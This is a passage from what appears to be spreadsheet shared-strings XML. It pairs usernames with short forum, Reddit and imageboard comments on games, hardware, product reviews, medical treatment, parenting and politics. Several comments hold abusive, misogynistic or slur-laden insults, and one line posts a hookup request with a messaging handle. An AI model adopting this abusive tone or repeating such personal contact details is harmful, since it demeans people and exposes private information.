  </si>
  <si>
    <t>You can't even build a PC with all the directions on the Internet without begging for handholding. I wouldn't talk about ignorance.</t>
  </si>
  <si>
    <t>Diva Diane</t>
  </si>
  <si>
    <t>This tape is great for sealing up boxes. It is strong and seals really well. The fall back tabs on the dispenser really keep the tape from sealing back on itself, unlike other brands of tape I have used before. When I started the roll, the tape split into smaller strips, but there was a strip across the width of the tape, near the beginning of the roll, that helped you pull up the whole width of the tape. So no getting pieces of tape that are only a centimeter of two in width, or wasting your tape trying to get the full width. That is an excellent feature! The only drawback is that the tape doesn't roll off very easily, and I had to turn the roll on the dispenser with my other hand. In other words, I had to manually unspool the tape before putting it on the package, instead of just pulling the tape out across the package. But other than that, this tape is the best I have ever used. I would give it 4 1/2 stars! [This review was collected as part of a promotion.]</t>
  </si>
  <si>
    <t>fields</t>
  </si>
  <si>
    <t>That’s a little wrong. [Discover Checking](https://www.nerdwallet.com/blog/banking/discover-bank-review/?trk_channel=web&amp;trk_element=hyperlink&amp;trk_location=product-summary-table-rating-link&amp;trk_nldt=undefined&amp;trk_pagetype=roundup&amp;trk_topic=Checking%20Accounts&amp;trk_vertical=Banking) has 1% cash back and is one of the recommended checking accounts in /r/personalfinance and Nerdwallet. It’s pretty good and I love that they have competent customers service like Amex and Schwab.</t>
  </si>
  <si>
    <t>eugenia_loli</t>
  </si>
  <si>
    <t>Nice. Just be careful how you link for it. You linked to it with a time stamp, so people only get to see a few seconds. Most people would not bother going back to the timeline.</t>
  </si>
  <si>
    <t>TheKDub</t>
  </si>
  <si>
    <t>7 minutes ago, Cabdriver35 said: I have cooler master masterliquid ml240r I just want know is it i9 9900k getting too hot for this aio even in idle? Yes, it'll be fine. You might want something a little bigger if you're going to be overclocking it heavily, but a 240mm AIO should be fine for stock speeds and mild overclocks. Specs: CPU - Intel i7 8700K @ 5GHz | GPU - Gigabyte GTX 970 G1 Gaming | Motherboard - ASUS Strix Z370-G WIFI AC | RAM - XPG Gammix DDR4-3000MHz 32GB (2x16GB) | Main Drive - Samsung 850 Evo 500GB M.2 | Other Drives - 7TB/3 Drives | CPU Cooler - Corsair H100i Pro | Case - Fractal Design Define C Mini TG | Power Supply - EVGA G3 850W Certifications: Testout PC-Pro, Network-Pro, &amp; Security-Pro; CompTIA A+ 801 &amp; 802; Certiport IC3 GS5; Microsoft Technology Associate: Software Development Fundamentals.</t>
  </si>
  <si>
    <t>automatez</t>
  </si>
  <si>
    <t>The heavy breathing lol</t>
  </si>
  <si>
    <t>OrganicPesticide</t>
  </si>
  <si>
    <t>Pretty sure consoles were finally able to hit 60 FPS with this last generation.</t>
  </si>
  <si>
    <t>Mason Firefly</t>
  </si>
  <si>
    <t>[link to www.foxnews.com (secure)] Quoting: Deplora_B Go President Trump!!! We love you!!! Fuck You Leftist!!!</t>
  </si>
  <si>
    <t>UnculturedSwine76</t>
  </si>
  <si>
    <t>“I’m bout to end this mans whole career</t>
  </si>
  <si>
    <t>gator426428</t>
  </si>
  <si>
    <t>That's a quote from the movie 'due date'</t>
  </si>
  <si>
    <t>CyclicaI</t>
  </si>
  <si>
    <t>The resident talking to the nurse in the halway and the guy in the room next to me, plus various beeps and equipment</t>
  </si>
  <si>
    <t>BradBENP</t>
  </si>
  <si>
    <t>You're gonna be real happy with trilogy edition. Best way to experience the Prime games.</t>
  </si>
  <si>
    <t>Marios_Z</t>
  </si>
  <si>
    <t>I mean seriously i play this game for 7 years and i never meet any hacker...and now that the servers are closing i encounter every day at least one hacker...which is very sad because we are not able to enjoy to game before the servers are closed</t>
  </si>
  <si>
    <t>RMiller</t>
  </si>
  <si>
    <t>UP</t>
  </si>
  <si>
    <t>mobaisle</t>
  </si>
  <si>
    <t>Its a contraction of; "anyone (who has been) elected (whom) you hate is automatically Russian (or presumably Russian controlled)". For fuck's sake if you're going to attack an opponent why not challenge their ideas rather than their grammar? It's tantamount to implying you have no ideological counter.</t>
  </si>
  <si>
    <t>Sanctum46</t>
  </si>
  <si>
    <t>What's this facebook shit</t>
  </si>
  <si>
    <t>Kagedgoddess</t>
  </si>
  <si>
    <t>My brother’s X wife did this to her daughter.... CPS got involved. It was probably the cumlative effect of all the other bullshit though. I dont think its “normal” for schools to do this.</t>
  </si>
  <si>
    <t>That_Guy247</t>
  </si>
  <si>
    <t>I was super heated with the new Mario Party. Smoked my daughter in all the mini games, then she gets two cheap stars at the end to win... but then she was so excited and bragged to everyone that it kind of made me happy for her. I don't let my kids win typically, but when they do they feel way better about it.</t>
  </si>
  <si>
    <t>mint002</t>
  </si>
  <si>
    <t>In addition, do not rely on quick saves for everything, keep in mind to new hard saves at key points of your journey. It will definitely help you.</t>
  </si>
  <si>
    <t>exzyle2k</t>
  </si>
  <si>
    <t>My mother and step-father raised some abandoned duck eggs when they both worked at the local mall. Guess the mom got spooked when they were cutting the grass around the pond where she had the nest, and nobody came back for them. Brought them home, put them in an improvised incubator (file box with a clamp light for heat). They hatched and we raised them to adulthood. Three of them. Two males and a female. I remember watching my mom running in the backyard flapping her arms trying to teach them how to fly. Ever since then we get ducks as visitors, subsequent generations. Passing along the knowledge of "this is a safe space" to the next generation, who in turn passes it along. Been in our house for about 33 - 34 years. I would say easily 25 years worth of duck visitors every spring &amp; summer.</t>
  </si>
  <si>
    <t>&gt;implying I can't break these throws on command</t>
  </si>
  <si>
    <t>eXpEnSiVe-MaCaW</t>
  </si>
  <si>
    <t>Nah im starting to think cats hate you</t>
  </si>
  <si>
    <t>apaksl</t>
  </si>
  <si>
    <t>I think it's cause the 03 accord is the first year of its generation, and the 03 acrua cl is the last year of its production run, I'm pretty sure it's based off the 99-02 accord (or whatever year range). the 03 accord I had used a one piece key with integrated lock/unlock buttons, but my 03 cl has a fob separate from the key, for instance.</t>
  </si>
  <si>
    <t>Livin The Dream</t>
  </si>
  <si>
    <t>Radiohead said: I just tape down any aperture rings. Never used them and always use the front wheel for it instead. Stops them getting knocked. Click to expand...</t>
  </si>
  <si>
    <t>BallSerbia</t>
  </si>
  <si>
    <t>Map of Europe if sea levels rose by the height of Mt. Everest</t>
  </si>
  <si>
    <t>Emile</t>
  </si>
  <si>
    <t>Hi All, Been looking at adding a 15" sub to my CF-3's, but really have no clue if it is needed OK; 2 channel setup. Small 12x12x8ft room. CF-3's on a Kenwood Basic C2/M2 (220wpc). Supposedly the CF-3's go down to 35Hz (@ -3dB ... meaning "half volume" at this point). Was going to try a Klipsch R-115SW ... actually "bought" one but the CraigsList seller "changed" his mind Specs say the R-115SW goes down to 18Hz (assume at -3dB ?). Would this (or another sub) increase my listening experience or is it a waste of time due to limited sub 35Hz sound in my music? Music is mostly 70's rock (Chicago, Genesis, etc) and classical (Beethoven, Tchaikovsky, etc). Many thanks for your advise. Cheers, Emile Add-on ... Haha; due to the small room size I would have to put the sub in a closet with ventilated doors ... afraid it would just rattle the shelves and make for a "bad" sound experience</t>
  </si>
  <si>
    <t>JustinJSrisuk</t>
  </si>
  <si>
    <t>She’s the true queen of burlesque rap - Aja found dead in a ditch.</t>
  </si>
  <si>
    <t>ResponsibleCharacter</t>
  </si>
  <si>
    <t>depends on your area, but if the tap water is good, nothing is wrong with it... gotta at least give a bitch some ice though DAMN. If the tap water is "bad," where you live you need a brita or a fridge filter, can't just offer people stinky weird tasting water.</t>
  </si>
  <si>
    <t>hotukdeals.com</t>
  </si>
  <si>
    <t>Posted 6th Aug Local Hope this might be useful for someone. This was in Asda, Newark. Several on the shelf.</t>
  </si>
  <si>
    <t>themacmeister</t>
  </si>
  <si>
    <t>Yeah, the Realtek (RTL8111) kext handles a great amount of ethernet NICs</t>
  </si>
  <si>
    <t>papaN0EL34</t>
  </si>
  <si>
    <t>No worries. Have a good one!</t>
  </si>
  <si>
    <t>MeAndMine</t>
  </si>
  <si>
    <t>These studies are from the mid-1990s so the science on Neo-Adjuvant Chemotherapy and Radiation Therapy has been proven for a long time. I'm surprised that a surgeon would remove the tumor given that it goes against the standard treatment protocol. My surgeon wouldn't remove the tumor without Neo-Adjuvant ChemoRadiation. I doubt that other surgeons would either. Thank you for the links! And yes, I was thinking the same thing. F 56 non-smoker 8/5/2019 - Colonoscopy - 4-5 cm rectal mass, 2-3 cm proximal to anal verge and 6mm polyp 8/13/2019 - CT - No mets 8/19/2019 - Rectum: Adenocarcinoma arising from tubulovillous adenoma. Descending colon: tubular adenoma 8/23/2019 First visit with surgeon 8/26/2019 First visit with oncologist 8/26/2019 MRI CEA 8/19/19=3.9, 8/26/19=7.1 9/6/2019 - T3N2a 9/11/2019 - Radiation begins - 5.5 weeks along with oral capecitibine</t>
  </si>
  <si>
    <t>TentedCrib4</t>
  </si>
  <si>
    <t>I know this is the second of your comments I've replied to, but I'm literally shedding tears of joy right now because of this comment. More autistics need parents like you. (And this also why we need more and better representation of autistics in the media, gosh dang it!)</t>
  </si>
  <si>
    <t>dudleymooresbooze</t>
  </si>
  <si>
    <t>Wait is that not supposed to happen every time I pee?</t>
  </si>
  <si>
    <t>IyRuK</t>
  </si>
  <si>
    <t>Do you mean Google maps beta?</t>
  </si>
  <si>
    <t>Mectrid</t>
  </si>
  <si>
    <t>Honestly, I'd rather see him on Zarya than Hog at the moment.</t>
  </si>
  <si>
    <t>DoggoDude979</t>
  </si>
  <si>
    <t>Why am I actually disgusted by this I’m not being homophobic, cause I’m gay, but... just.... w h y</t>
  </si>
  <si>
    <t>Cosmic_Ostrich</t>
  </si>
  <si>
    <t>Why can't it apply to Salamanders?</t>
  </si>
  <si>
    <t>aqrn07</t>
  </si>
  <si>
    <t>You didn’t actually answer any of the questions. From a technological point of view, saying that audio can be “reversed” due to data retrieval sounds like gibberish.</t>
  </si>
  <si>
    <t>prgkmr</t>
  </si>
  <si>
    <t>Exactly, the Halo video game series is actually based on the story of the crips and bloods.</t>
  </si>
  <si>
    <t>CoffeeSlutt</t>
  </si>
  <si>
    <t>The graphics look stunning. The game looks like it's going to play similar to Outlast. No combat. You're in the trenches in the worst conditions, during night and in rain and you're being pursues by this huge demon thing. https://youtu.be/uuyaPm1bXtk Tell me that doesn't look sick.</t>
  </si>
  <si>
    <t>annie-josa</t>
  </si>
  <si>
    <t>NTA at all. If your mother won't set up healthy boundaries, then they need to face consequences to avoid something worst from happening.</t>
  </si>
  <si>
    <t>Bernies_Hair</t>
  </si>
  <si>
    <t>Well written/said. I certainly see your 'glass full' point of view.</t>
  </si>
  <si>
    <t>Sakatsu_Dkon</t>
  </si>
  <si>
    <t>Look, if this were a game other than RuneScape, I'd agree. But the fact is that this game was made as a text-driven, point-and-click, open-world adventure game. It's specifically designed to be old school, and in old school games like this there were even fewer visual cues to help people. If you're not even going to pay attention to dialogue in the tutorial (arguably one of the most important places for you to read dialogue), then the rest of the game is going to be incredibly difficult. You can't just ignore a fundamental aspect of the game and expect to get very far.</t>
  </si>
  <si>
    <t>mrvrsick</t>
  </si>
  <si>
    <t>My first attempt was horrendous. I likely did too much leaf and did way too much time. I'll be taking a more scientific approach next time, not just throwing a fistful of leaves in a pot and doing some chores. I tried it because my mom said it was good for the nerves, and when I looked it up, it was actually a popular thing for anxiety and other relaxation stuff.</t>
  </si>
  <si>
    <t>Ben_T_Willy</t>
  </si>
  <si>
    <t>Top weight loss tip?</t>
  </si>
  <si>
    <t>ApocalypseMeow1</t>
  </si>
  <si>
    <t>Stry thinking putty and storing memories in time/objects</t>
  </si>
  <si>
    <t>LMSK_</t>
  </si>
  <si>
    <t>J.B. Mauney Special - All 2019 Broken Leg Rides, Past Wrecks and Best Rides</t>
  </si>
  <si>
    <t>Do-It-On-Purpose</t>
  </si>
  <si>
    <t>I don’t know what it means that I thought the racist part was that the yellow ranger in the suit has a totally flat chest. Had to read the comments to catch on :/</t>
  </si>
  <si>
    <t>entwined82</t>
  </si>
  <si>
    <t>I feel like this isn't half as shocking as Dan's assumption that food in the fridge somehow uncooked itself or was no longer safe to eat. That was the one that broke me.</t>
  </si>
  <si>
    <t>metallicamas</t>
  </si>
  <si>
    <t>What do you mean not much is being said about it? It's been all over reddit and instagram for the past days.</t>
  </si>
  <si>
    <t>aLastingFlame</t>
  </si>
  <si>
    <t>Cooper heres the code 24YRkSiqkCA</t>
  </si>
  <si>
    <t>rlvnorth</t>
  </si>
  <si>
    <t>Bhima's Warung is outstanding (King/University) - nothing to look at outside, but great inside - just celebrated 25 years and the chef also has a place in Bali, Indonesia. Alternatively, King Street Trio in Uptown was one of the top places to eat in Canada - as is Langdon Hall in Cambridge - it's a Relais &amp; Chateaux restaurant (Gourmet Dining). I'd reserve at any of them.</t>
  </si>
  <si>
    <t>BlGBOl</t>
  </si>
  <si>
    <t>higgy about to meme a double down the line</t>
  </si>
  <si>
    <t>ResearchOnYourMom</t>
  </si>
  <si>
    <t>If you really don't want to pay for mailers, you can always make your own with moving boxes. You can also make pads too. Moving boxes have thicker and stronger cardboard than mailers too. Super easy but they can take some time. I usually make them when watching a show or listening to some music.</t>
  </si>
  <si>
    <t>Qezents</t>
  </si>
  <si>
    <t>Our institutions are already compromised. They're exclusively liberal and "woke". If they weren't this shit wouldn't be tolerated.</t>
  </si>
  <si>
    <t>Arsnicthegreat</t>
  </si>
  <si>
    <t>Definitely. Or really anything. I'd get me a nice Chinese or Russian SKS(hell a good West German one would be hella cool), a nice mid-range AR, hell I've got plenty of money for a good-condition M1 and a crate of mosins to boot.</t>
  </si>
  <si>
    <t>EclecticOrchid</t>
  </si>
  <si>
    <t>Yes, however I think the cop was intentionally regulating traffic speed by driving 70mph (which is above the speed limit) in the left lane. The onramps in the part of the freeway in this video have very short, limited-visibility merges and almost every day I see near misses or people slamming on their brakes.</t>
  </si>
  <si>
    <t>TheG-What</t>
  </si>
  <si>
    <t>She was a whore! He was doing a lot of coke!</t>
  </si>
  <si>
    <t>partaloski</t>
  </si>
  <si>
    <t>No need to imagine, here is the result and as you can see it's real AF</t>
  </si>
  <si>
    <t>flythe-w</t>
  </si>
  <si>
    <t>there is a warning with the CPU and motherboard - will this still be okay and compatible?</t>
  </si>
  <si>
    <t>CoMaBlaCK</t>
  </si>
  <si>
    <t>Hi honeys sorry about trapo chap house</t>
  </si>
  <si>
    <t>Herr_G</t>
  </si>
  <si>
    <t>Whoever made this was an Instagram user for some time to be able to translate.</t>
  </si>
  <si>
    <t>plantmaterial</t>
  </si>
  <si>
    <t>I agree, fuck fascism! Which is why I oppose Antifa from violently shutting down free speech. Also, the protesters aren't fascists.</t>
  </si>
  <si>
    <t>semih6797</t>
  </si>
  <si>
    <t>Og lyn and every micaiah</t>
  </si>
  <si>
    <t>chinacat2002</t>
  </si>
  <si>
    <t>That’s what I’m doing. Hopefully, at least one opens up.</t>
  </si>
  <si>
    <t>honeysuckleghost</t>
  </si>
  <si>
    <t>The love will turn to resentment. You can have the love and the sex life w someone else.</t>
  </si>
  <si>
    <t>snowracer21</t>
  </si>
  <si>
    <t>It was INS prior to the formation of ICE</t>
  </si>
  <si>
    <t>tdlan</t>
  </si>
  <si>
    <t>Another drop wouldn't have happened if Stuart held the game up for nothing</t>
  </si>
  <si>
    <t>Ciqbern</t>
  </si>
  <si>
    <t>tYL the film 88 Minutes has a running time of 107 minutes.</t>
  </si>
  <si>
    <t>Zechs90</t>
  </si>
  <si>
    <t>The linking of that subreddit immediately followed by someone else linking to /r/NothingEverHappens is also quite annoying.</t>
  </si>
  <si>
    <t>&gt;&gt;192467510 &gt;first few episodes focus on Hibiki and Tsubasa More like the first half, with Hibki being focused on 80's kung-fu movie parody training and Tsubasa being a cunt with her "A sword needs no friends" attitude. &gt;as soon as Chris shows up, Tsubasa takes a vacation so that screentime can be better split to developing the new character Exactly why it's utter shit. Tsubasa finally gets over her cunt attitude and stops being a stupid fucking cunt blaming Hibiki for Kanade's death and then she loses screen time. Chris' development could have been done in half the screen time it took. &gt;throughout the entire season, Ryoko's dialogue serves to foreshadow Fine's character I sleep. &gt;Hibiki has an actual character arc, Tsubasa has an actual character arc, Chris has an actual character arc; none of them are rushed because there are only 3 main characters There's forced shitty character pacing from GX, and then there's character pacing that was unnecessarily long (Season 1's 4 episode long focus). It takes about 10 damn episodes for the characters to finally become a proper team and work together. Season 1 is like the set-up to the other seasons. If you liked utterly tired, old character set-ups of the main shounen protag wanting to become strong, the cunt characters who need 4+ episodes to be befriended because of a dark past, then sure, "best pacing, best writing." And I will still never understand the jerking for the character that had to make the entire Symphogear universe and story convoluted. "I'm a several thousand year old priestess that tried to build a tower to speak with god and the tower got struck down and he punished us by making all humans unable to communicate, so for the next millenias I was in the bodies of famous historical figures and now I want to rebuild the same tower to speak with god and when it fails I rage and try to destroy the world only to become 'good' again because Hibiki said we should be friends" Fine.</t>
  </si>
  <si>
    <t>StruanT</t>
  </si>
  <si>
    <t>People that still believe in imaginary friends and fairy-tales are accusing atheists of childish immaturity? It is the religious who need to grow the fuck up.</t>
  </si>
  <si>
    <t>Hdfgncd</t>
  </si>
  <si>
    <t>I think that’s called a tumor</t>
  </si>
  <si>
    <t>&gt;&gt;53783949 i wish i was white and i wish whites didnt hate us</t>
  </si>
  <si>
    <t>thedroideka</t>
  </si>
  <si>
    <t>Liam Neeson. Qui-Gon, Ra's Al Gul, etcetera. unlimited power.</t>
  </si>
  <si>
    <t>z-r0h</t>
  </si>
  <si>
    <t>&gt; Seeing as that I only need literally 1x Selenium Well then you can possibly just visit a trader right now and trade in whatever you have got.</t>
  </si>
  <si>
    <t>macjigiddy</t>
  </si>
  <si>
    <t>SSRIs are so varied, they all have different side effects and changes. They all effect everyone differently too. How I feel on a drug will be different to another person. Personally, I've gone through a variety of SSRIs and the general gist is that they helped my depression but not my anxiety. They dampen your emotions and senses, increase suicidal tendencies and can make you really exhausted. But once you know which drug you'll be on, PM me. Might be able to help more then</t>
  </si>
  <si>
    <t>Terahdra</t>
  </si>
  <si>
    <t>So what happens is this: You activate the ability, it goes on the stack. You choose a card to discard. If you discard a madness card, you have to acknowledge the madness trigger and place it into exile, but the activated ability **has to finish resolving** first before you take any action for that spell. After you draw a card in your instance, then the trigger is placed onto the stack and you may cast fiery temper for it's madness cost.</t>
  </si>
  <si>
    <t>deckard58</t>
  </si>
  <si>
    <t>&gt; I mean, I agree that your identity is checked either way Yeah, that's what I was thinking about. (I also agree that just checking names in and out, although necessary, isn't *enough*)</t>
  </si>
  <si>
    <t>hamjandy</t>
  </si>
  <si>
    <t>If I got my CSR in 2016, can I downgrade to FU and be eligible for the current CSP 60k bonus?</t>
  </si>
  <si>
    <t>KronoriumExcerptB</t>
  </si>
  <si>
    <t>I just don't think any of the zombies games serve as a good ending except for maybe BO4 (still to be seen). None of them fit any of the parameters that an ending has. Endings give you some type of strong emotion, happiness, sadness, or both. When Halo 3 ends, for example, you're happy that the war is over and satisfied at the victory, but also sad as the main character is lost in space.</t>
  </si>
  <si>
    <t>chesterwalnut</t>
  </si>
  <si>
    <t>Where is r/trees?</t>
  </si>
  <si>
    <t>chris2618</t>
  </si>
  <si>
    <t>We dont have Corbyn govenment</t>
  </si>
  <si>
    <t>Kennedy1224</t>
  </si>
  <si>
    <t>I didn’t and it freaked me out for the two and a half hours I didn’t because you basically sign your life away</t>
  </si>
  <si>
    <t>earthlybird</t>
  </si>
  <si>
    <t>*Tim Minchin's Thank You God intensifies*</t>
  </si>
  <si>
    <t>DarkAngelJinx</t>
  </si>
  <si>
    <t>RIP Jim the pirate lord ❤</t>
  </si>
  <si>
    <t>glendadanzig</t>
  </si>
  <si>
    <t>Thanks man! Yeah, if there's one thing I've learned about the Dark Souls community, it's that for every person who is cool as fuck, there's a miserable twat with a God complex who thinks that whoever doesn't play Dark Souls the way they do sucks. On the plus side: they're easy to laugh off, even though I'm sure they think everybody else takes them seriously. Ultimately, I think you said it best: they're simply assclowns lol.</t>
  </si>
  <si>
    <t>For both mine I needed more newborn diapers than I thought. Never can have enough wipes!!! They go quick! Get plenty of Vaseline if you are having a boy and getting him circumcised... I had no idea I would need this and a lot of it! Newborn clothes I needed more of. Also receiving blankets are good for a lot! Don't stock up on formula if you are formula feeding, until you know what will work best for your baby. Same with bottles. Spit up rags! And newborn mittens bc they spit up all over those. Also, I didn't have a baby hair brush bc I didn't think I'd need it... but my son was born with a ton of hair and i wish I had one after I gave him his first bath, lol.</t>
  </si>
  <si>
    <t>corytrevor710</t>
  </si>
  <si>
    <t>The way you normalize cheating is outright disgusting. But what’s even worse is you can’t even be truthful to yourself and just admit you want drama and vajayjay tingles. You are why men aren’t getting married. They don’t want to pay for you to go fuck whoever you want. If I was your husband I would be bumping uglies with whores right in front of you.</t>
  </si>
  <si>
    <t>caressey</t>
  </si>
  <si>
    <t>just walk on them. literally walk on them and squish them like in mario kart when those blocks squish you down</t>
  </si>
  <si>
    <t>CANDolphan</t>
  </si>
  <si>
    <t>SCLSU Mud Dogs said: ↑ weird post, but ok Click to expand... Oh personal attacks are cool? Good. Let’s get to it! I’ll try to use pictures to express the point next time. Reading your posts gives me the indication... hm... how to say this words ain’t gettin to your brain well</t>
  </si>
  <si>
    <t>mrowlBR</t>
  </si>
  <si>
    <t>Because constant digestion isn’t good for your digestion quality. Can you sprint at 7mph all day long? No. You’d get tired and your body would fail. Can you sprint at 7mph for a little bit, take a break, and then do it again? Yeah! The bloating being down is a good thing- you’re not supposed to be bloated...</t>
  </si>
  <si>
    <t>oldmowgli</t>
  </si>
  <si>
    <t>The Elder Scrolls III Morrowind</t>
  </si>
  <si>
    <t>gDangItHanna</t>
  </si>
  <si>
    <t>This is the talk I never had. So wholesome.</t>
  </si>
  <si>
    <t>Thundieman</t>
  </si>
  <si>
    <t>it still is very good with the ziplines tho</t>
  </si>
  <si>
    <t>Justanoldgamerdude</t>
  </si>
  <si>
    <t>I am borrowing my Sisters set up too see how I go with it before shelling out the the big bucks.</t>
  </si>
  <si>
    <t>worstn1ghtm4r3</t>
  </si>
  <si>
    <t>They spend their entire screentime ignoring the flat wonders of the world and chasing after vert and purple heart. It's actually one of the only times you see IF get self conscious.</t>
  </si>
  <si>
    <t>morganfreeman95</t>
  </si>
  <si>
    <t>Barca didn't make all their HG players unwanted by having Ake and Chalobah leave and having RLC go out on loan, forcing us into a position with very little leverage to sign an HG player for 35m. While also having an unhappy Fabregas off the back of 16/17 which was lucky he ended up staying, aka another HG player. Valverde also did not go and personally scout Bakayoko and ask for him, and the board obliged on that request.</t>
  </si>
  <si>
    <t>&gt;&gt;119759564 &gt;PhD computer sciences Programming sock guy really fucked /g/ into the dirt optics wise</t>
  </si>
  <si>
    <t>SaViNgSaDiE</t>
  </si>
  <si>
    <t>That sounds cool I may try this too</t>
  </si>
  <si>
    <t>k995</t>
  </si>
  <si>
    <t>No that's the new "tolerant" people. As long as you agree to anything /anyone it's fine.</t>
  </si>
  <si>
    <t>Synyster31</t>
  </si>
  <si>
    <t>&gt;!So long &amp; thanks for all the fish!&lt;</t>
  </si>
  <si>
    <t>voicesofunknown</t>
  </si>
  <si>
    <t>Beginning of another Arms Race?!US-Russia treaty ends, eliminating and allowing both the countries to manufacture and deploy ballistic nuclear warheads again.Arms race during the Cold War was no Christmas for the world economy and other countries, hence this arms race might just be the spark required for World War III. [https://www.voicesofunknown.com/post/us-russia-pact-ends-beginning-of-another-arms-race](https://www.voicesofunknown.com/post/us-russia-pact-ends-beginning-of-another-arms-race)</t>
  </si>
  <si>
    <t>SilkFlower_</t>
  </si>
  <si>
    <t>“I launch my fragrance called ‘Integrity’ I sell the fact that I can’t be bought” is one of my favorites.</t>
  </si>
  <si>
    <t>wobdlf</t>
  </si>
  <si>
    <t>You can’t eat cats kevin, you can’t eat cats.</t>
  </si>
  <si>
    <t>kyoger_Busted</t>
  </si>
  <si>
    <t>Picture i the background said not again because he does it after posting on redit</t>
  </si>
  <si>
    <t>conbon7</t>
  </si>
  <si>
    <t>I don’t get y ppl are mad? It always is going be tasteless the whole point is that your supposed to Rest In Peace when you are dead.</t>
  </si>
  <si>
    <t>Goathead</t>
  </si>
  <si>
    <t>i like this pick better than the Cozens one</t>
  </si>
  <si>
    <t>&gt;&gt;21236117 Is that good or bad?</t>
  </si>
  <si>
    <t>ihavenotime4this</t>
  </si>
  <si>
    <t>was that ever in doubt?</t>
  </si>
  <si>
    <t>Ouroboros_0</t>
  </si>
  <si>
    <t>I’ve recently been building Galaxy Photons too and I’ve really be enjoying it, do you have a decklist handy I could take a look at?</t>
  </si>
  <si>
    <t>joshuachenys</t>
  </si>
  <si>
    <t>wait why not double savage blow? wouldn’t the 7 damage be better than the 6 attack?</t>
  </si>
  <si>
    <t>LopsidedRedditor</t>
  </si>
  <si>
    <t>Yessir! Thats why Im glad I have a private office no one but me is allowed in.</t>
  </si>
  <si>
    <t>dripxlife</t>
  </si>
  <si>
    <t>[https://imgur.com/sCxoCne](https://imgur.com/sCxoCne) I think I broke something. I believe I may have installed a couple old versions and broke Latte. It was working a few hours ago. Now, when I install the version that actually worked before, it won't show the configuration screen. How can I clean all the old Latte files and start fresh? Thanks.</t>
  </si>
  <si>
    <t>ranjan_zehereela2014</t>
  </si>
  <si>
    <t>But. What's wrong in that. Do you understand that recently there were attempts to lynch the husband of a Muslim BJP worker. Most of the Muslim BJP supporters are too scared to come out</t>
  </si>
  <si>
    <t>Suzetsu_</t>
  </si>
  <si>
    <t>What molds would have been used for this though or is it a straight up custom from the head down.</t>
  </si>
  <si>
    <t>Archaengel</t>
  </si>
  <si>
    <t>Parkland students unveil sweeping gun-control proposal and hope for a youth voting surge in 2020</t>
  </si>
  <si>
    <t>limitedz</t>
  </si>
  <si>
    <t>Campden tablet now, give it a stir. Then in the morning stir it t up a bunch then pitch your yeast, 2 packs if possible. The campden works pretty fast and will sure out of solution easily.</t>
  </si>
  <si>
    <t>The_Chaos_Pope</t>
  </si>
  <si>
    <t>44/Attack Helicopter/[expunged for opsec] u?</t>
  </si>
  <si>
    <t>sctroll</t>
  </si>
  <si>
    <t>I didn't take any, I majored in CSBA and learned graphics APIs and UE4/unity by myself to build AR and VR apps. After I learned how to program a GPU I was able to pick up AI as a tangential field. Both come down to using GPU shaders to perform a lot of math very quickly so I was already 50% of the way there without a data science background. I never learned how to build a custom game engine on top of a graphics API with realtime multiplayer which I think is one of the most important series of classes at CS Games because nobody else but USC teaches this stuff anymore. This part of the curriculum is what makes you stand out to AAA studios that develop and maintain their proprietary game engines and recruit the top of the top technical talent (such as from the #1 Game Dev program). The other 80% of the industry will just use UE4 and not need programmers at all.</t>
  </si>
  <si>
    <t>difab62</t>
  </si>
  <si>
    <t>i still lose sleep over not going to the Stranger tour in NYC</t>
  </si>
  <si>
    <t>Ahmed</t>
  </si>
  <si>
    <t>I was told that a free cleaning services can be ordered once per 3-night (host policy). the place was very clean but a daily cleaning for room will be better for visitors. Notices were reported for air condition weak performance and the problem was fixed. the beaches in hurghada closes at 5:00 pm (out of host control). I think there will be no competitive of the value for money in whole Hurghada. The location is very attractive. Wifi services were satisfied. I recommend it strongly for families. the place was very clean and well designed. the staff members were very helpful and supportive. They call me just after completing the reservation -without a second delay-. Stayed in August 2019</t>
  </si>
  <si>
    <t>BlueberrySpaetzle</t>
  </si>
  <si>
    <t>“He shot me in the lap!” “The lap?” “The lap!”</t>
  </si>
  <si>
    <t>Zorrox</t>
  </si>
  <si>
    <t>He was fighting one of the best to ever do it. He showed heart and came from behind. That was impressive as fuck</t>
  </si>
  <si>
    <t>WTFever_</t>
  </si>
  <si>
    <t>Oh, in that case, I got mine to drop on Mt. Hobs. Cockatrice has a 5% chance to drop from Cockatrices, but only a 0.4% chance to drop from Helldivers.</t>
  </si>
  <si>
    <t>AssholeMcMiniFridge</t>
  </si>
  <si>
    <t>Those are peasant numbers. I have thousands of hours over at least 30 play throughs and still don't know how to play caravan.</t>
  </si>
  <si>
    <t>&gt;&gt;13719456 Extended families without religion or Jesus for them to tolerate and forgive each other? Can you show me examples of a strong extended family that came as the result of Marx?</t>
  </si>
  <si>
    <t>conjoe1999</t>
  </si>
  <si>
    <t>But here’s where the problem comes in. You’re duck hunting, a flock flies right overhead. You got one shot before you have to take the time to reload. Then they’re gone. Not trying to start shit. But honestly curious what you think should be don’t in this situation</t>
  </si>
  <si>
    <t>Frfr any girl wanna hook up tonight London Kik: mynameis2basic Im a M/20</t>
  </si>
  <si>
    <t>CrazyGoose24</t>
  </si>
  <si>
    <t>Quote: from bamarover15 &gt;&gt; Or when your opponent misses the extra point!! Haha This is my favorite! ...and then I do it.</t>
  </si>
  <si>
    <t>angelbaby9523</t>
  </si>
  <si>
    <t>Oh! Really? I thought you did. We haven’t actually purchased it yet and I didn’t realize that. Thanks!!</t>
  </si>
  <si>
    <t>jaecee73</t>
  </si>
  <si>
    <t>In your opinion do you think genetic limitations are a thing? Maybe closer to 5.14 ? I know after that point your considered world class and pretty much require a lifes amount of work to achieve. Encouraging to hear your thoughts, thank you!</t>
  </si>
  <si>
    <t>FlyingGrayson89</t>
  </si>
  <si>
    <t>Knees for days</t>
  </si>
  <si>
    <t>gusrub</t>
  </si>
  <si>
    <t>Well, ETA most common movements for watches in the 42-44mm range are also quite small if you consider the case size, not as small as quartz, but still, as they were designed back when people wore smaller watches. Some of the bigger movements are either in-house to allow for better decoration and power reserve or modified pocket-size movements like the Unitas that won't fit in anything smaller than 40mm case. On the other hand, there are large quartz movements too. For instance, Bulova's precisionist are almost 40mm, that is why those watches are so big, almost all ranging from 43-45mm cases. This because the high frequency quartz crystal draws more power hence a larger battery is required and because the mechanism, although still quartz, it's usually more complex.</t>
  </si>
  <si>
